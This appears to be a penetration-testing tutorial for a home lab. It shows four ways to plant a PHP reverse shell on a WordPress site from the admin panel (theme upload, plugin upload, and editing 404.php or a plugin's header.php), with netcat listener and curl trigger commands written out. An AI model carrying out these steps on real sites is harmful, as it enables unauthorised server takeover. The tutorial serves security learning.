In this article we are going to share How to upload a shell on WordPress CMS And get a reverse shell target machine, I already set up WordPress Lab on my Localhost Server, if you haven’t an idea how to install WordPress CMS one Apache localhost Server Please click the link.
Multi way to get reverse shell WordPress Server
- Upload Shell through Add Theme
- Upload Shell through Add Plugins
- Themes templet into 404.php
- Using pre-installed Plugins into header.php
First We login with WordPress Admin Panel, then we go to themes option.
here we upload our php reverse shell, Click the Upload Theme Button and Browse your reverse shell and click Install Now.
After clicking the Install Now button we get an error ( The package could not be install. PCLZIP_ERR_BAT_FORMAT (-10) we ignore the error and move to the next step.
In my case, my upload directory is hostname/wp-content/uploads/2020/12/shell_name.php, if you use the method different year and month please change it to your current year or month.
Now Our Shell is uploaded on the target server. let’s start our netcat listener and execute our shell by using the curl command. there is two way to execute the shell payload first is navigating the upload directory url and next is using the curl command.
sudo nc -lvp 4545 curl -v http://temp.hacknos.com/wp-content/uploads/2020/12/shell.php
The Second method is uploading reverse shell on WordPress through the Add New Plugin method, let’s click the Plugins option and next click on Add New.
Now Our Plugins option is ready to upload malicious shells on WordPress, click on Upload Plugin and Browser your Reverse shell_ and again click on the Install Now button.
Again we get the same error ( The package could not be install. PCLZIP_ERR_BAT_FORMAT (-10) we ignore again the error.
Again we need to start our netcat listener and then we navigate the upload directory URL in the Browser. Wait After a Second we get a reverse shell target machine.
sudo nc -lvp 4545 temp.hacknos.com/wp-content/uploads/2020/12/p_shell.php
The third option is Injecting Malicious code in WordPress Preinstalled Theme, again we log in with WordPress Panel, but we haven’t permission to upload any file and plugins or themes.
then we run this step of getting reverse shell WordPress Machine, Let’s move the Themes option and click the Theme Editor.
In my case WordPress Activate themes name is Twenty Twenty, let’s go to the Themes Files option and click on 404.php ( 404 Template ) and replace all content with malicious php code and click update file.
We already start our netcat listener’ let’s navigate the themes uploaded URL and execute the Reverse Shell.
If your Activate theme is different replace the theme directory with theme name.
sudo nc -lvp 4545 temp.hacknos.com/wp-content/themes/twentytwenty/404.php
The Last option is upload Reverse shell on WordPress is Editing current installed plugins, many time our user privileges is very low our current login user haven’t permission to upload file on WordPress, then we choose the this option,
This option is an alternative of Themes Editor, Let’s click the Plugins button and next click on Plugin Editor and find any .php extension file, I choose header.php, then we replace the current content with PHP malicious code and click Update File.
Once the Plugin File is Updated again we need to start our Netcat Payload Listener and then we execute the reverse shell using the curl command. and the second way is navigating the edited plugging directory on the browser.
sudo nc -lvp 1234 curl -v temp.hacknos.com/wp-content/plugins/amp/templates/header.php